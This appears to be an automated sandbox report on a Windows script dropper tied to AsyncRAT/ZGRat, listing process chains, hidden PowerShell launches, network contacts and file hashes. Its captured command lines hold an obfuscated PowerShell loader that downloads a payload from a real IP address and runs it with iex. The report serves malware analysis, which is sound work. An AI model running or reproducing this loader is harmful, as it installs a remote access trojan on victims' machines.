ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yaaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ydaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ySaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ytaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yraUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yiaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ynaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yg(''http://185.81.157.103/96/1.txt'')').Replace('aUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥y','')|iex
C:\Windows\system32\taskeng.exe
taskeng.exe {A605EA56-7FCE-4A22-BA4B-B804128017D9} S-1-5-21-3818056530-936619650-3554021955-1000:SFVRQGEO\Admin:Interactive:[1]
C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\hich.vbs"
C:\Windows\System32\cmd.exe
cmd /c ""C:\Users\Public\hich.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\hich.ps1'"
Network
| Country | Destination | Domain | Proto |
| FR | 185.81.157.103:80 | 185.81.157.103 | tcp |
| FR | 185.81.157.103:80 | 185.81.157.103 | tcp |
Files
memory/2284-7-0x000000001B720000-0x000000001BA02000-memory.dmp
memory/2284-8-0x0000000001E80000-0x0000000001E88000-memory.dmp
memory/2284-9-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp
memory/2284-12-0x0000000002C70000-0x0000000002CF0000-memory.dmp
memory/2284-11-0x0000000002C70000-0x0000000002CF0000-memory.dmp
memory/2284-10-0x0000000002C70000-0x0000000002CF0000-memory.dmp
memory/2284-13-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp
memory/2284-17-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp
C:\Users\Public\hich.vbs
| MD5 | 741b5b0a474f0e0cd28fd880f68723c0 |
| SHA1 | 4de5489c4e56882514b3ab432048200eae65f90d |
| SHA256 | f7edde68b4f783fe07a6cb0d12ffc76b04a9d81747cff32eed06c7caee5f7b23 |
| SHA512 | 3783759fc24189ddb02ab9bd9888f4fe458ed378c6079d3fbd28af6fc34200d5f45ccd7e1c4beca90d9afe9d3bb29f7f20128c7b0a958c2c8a1a1ce8e9cc2f54 |
C:\Users\Public\hich.bat
| MD5 | 6c8a34a94e068b809145df09acbe153c |
| SHA1 | 0ec5c6964c6ccc949af47297eb9794f8f1ee4724 |
| SHA256 | c683e03275b7f8d2031a42bdde2b95e2f46e8811004205a092e87de4bae5d003 |
| SHA512 | 41431bb242a1b5848b8c4ab197dc6181db6f203bb26de68f492b99e876b63b73c6497fb996b0341045b1babd1c92be3346de116fa3699017d58e1d1199bfd805 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 615a7b1b6cd63e8be3b318138ff66688 |
| SHA1 | f0fb5b11ff93a7448a158b2345737fd336c6893d |
| SHA256 | b04be3f8c76d1e49c8f94d01bf8567c5b35295031c9edf676989d0b489d09a1c |
| SHA512 | 19d30cb7e4c6d1412ca22383fd3de296eff42a17118bf9a05e9acac5cb974bf7f7a709437cb6a7b62679f95710519d30af850729f60f829aebde6bad8cc439d0 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9G1B1EYCVQY3966BXDZH.temp
| MD5 | e32cad1ab4c8a3ad44873e572ee4dc01 |
| SHA1 | d0bf141a980383e56b523ccf0203ae37151ab10f |
| SHA256 | ed659d481dde23fd44f7a4a9c3c44cc27151e472f56652ab6053a3cf0c48b8d6 |
| SHA512 | aa0cff138df661064838132e286180d365d4f5f58c46879efddffada1cf7d4322f3d1d4e0622d4b873b02713d06a85bb26a1c8b1673595435e2f68366523e48c |
memory/2184-25-0x000000001B6C0000-0x000000001B9A2000-memory.dmp
memory/2184-27-0x0000000002DB0000-0x0000000002E30000-memory.dmp
memory/2184-28-0x00000000022A0000-0x00000000022A8000-memory.dmp
memory/2184-31-0x0000000002DB0000-0x0000000002E30000-memory.dmp
memory/2184-30-0x0000000002DB0000-0x0000000002E30000-memory.dmp
memory/2184-29-0x000007FEF51F0000-0x000007FEF5B8D000-memory.dmp
memory/2184-26-0x000007FEF51F0000-0x000007FEF5B8D000-memory.dmp
C:\Users\Public\hich.ps1
| MD5 | 7cc8cf044a1603d177667066b558742b |
| SHA1 | 822b16d67f89023109a2fb8a091c7949f7fb3bc4 |
| SHA256 | 3afa667e8bb93d5f1336e4e4ffdaa5c31508b3ff4d06309931f0a95121636d19 |
| SHA512 | 28bd26a588b874196e79b1e993ec9116fe0c3777c91630b5154fa745b378719726805162fcab9bac2b76cea30f20bc119d51eed9d4e95bd72cae68283b6ad175 |
memory/2184-32-0x0000000002DB0000-0x0000000002E30000-memory.dmp
memory/2184-34-0x0000000002AA0000-0x0000000002AD4000-memory.dmp
memory/2184-35-0x000007FEF51F0000-0x000007FEF5B8D000-memory.dmp
memory/2184-36-0x0000000002DB0000-0x0000000002E30000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-01-25 11:33
Reported
2024-01-25 11:36
Platform
win10v2004-20231222-en
Max time kernel
144s
Max time network
149s
Command Line
Signatures
AsyncRat
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
ZGRat
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4800 set thread context of 3484 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db (3).wsf"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex('(&aUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥y(aUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yGaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yCaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yM *aUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yWaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥y-aUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yOaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥y*aUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥y)NaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yeaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ytaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥y.aUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yWaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yeaUTSRQPONï